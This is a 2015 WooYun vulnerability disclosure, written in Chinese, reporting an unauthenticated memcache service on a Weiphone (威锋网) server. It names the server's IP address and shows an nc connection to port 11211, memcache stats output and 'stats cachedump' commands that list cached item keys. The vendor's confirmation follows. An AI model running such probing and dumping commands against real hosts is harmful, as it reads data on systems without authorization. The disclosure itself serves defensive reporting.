当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115638

漏洞标题:威锋网某重要站点未授权访问

相关厂商:weiphone

漏洞作者: xlz0iza1

提交时间:2015-05-24 21:19

修复时间:2015-07-08 21:50

公开时间:2015-07-08 21:50

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-24: 厂商已经确认,细节仅向厂商公开
2015-06-03: 细节向核心白帽子及相关领域专家公开
2015-06-13: 细节向普通白帽子公开
2015-06-23: 细节向实习白帽子公开
2015-07-08: 细节向公众公开

简要描述:

RT

详细说明:

http://61.129.68.194/user/login

DC3341C3-6DDD-49DD-9130-B2D0A09BC41F.png


memcache 未授权访问

C:\>nc -vv 61.129.68.194 11211
61.129.68.194: 反向连接查询主机: h_errno 11004: 无数据
(UNKNOWN) [61.129.68.194] 11211 (?) 打开

漏洞证明:

STAT items:29:evicted_unfetched 0
STAT items:30:number 4
STAT items:30:age 2343
STAT items:30:evicted 0
STAT items:30:evicted_nonzero 0
STAT items:30:evicted_time 0
STAT items:30:outofmemory 0
STAT items:30:tailrepairs 0
STAT items:30:reclaimed 43561
STAT items:30:expired_unfetched 34949
STAT items:30:evicted_unfetched 0
STAT items:31:number 5
STAT items:31:age 1610
STAT items:31:evicted 0
STAT items:31:evicted_nonzero 0
STAT items:31:evicted_time 0
STAT items:31:outofmemory 0
STAT items:31:tailrepairs 0
STAT items:31:reclaimed 43887
STAT items:31:expired_unfetched 33364
STAT items:31:evicted_unfetched 0
STAT items:32:number 10
STAT items:32:age 3314
STAT items:32:evicted 0


1D4E4760-38CA-4BE5-A816-BBAF67232F8D.png


stats cachedump 23 0
ITEM f2579c5c289ffef8a2134d42c200d512 [11201 b; 1432307872 s]
END
stats cachedump 2 0
ITEM 13ddcb03e7644398236f58edbb7d1006 [22 b; 1432308051 s]
ITEM 6c70786f832a1c7947735db954ee4698 [22 b; 1432308051 s]
ITEM c41ec223911f8c7a042447498a5b9dcd [22 b; 1432307489 s]

修复方案:

版权声明:转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-24 21:48

厂商回复:

谢谢提醒

最新状态:

暂无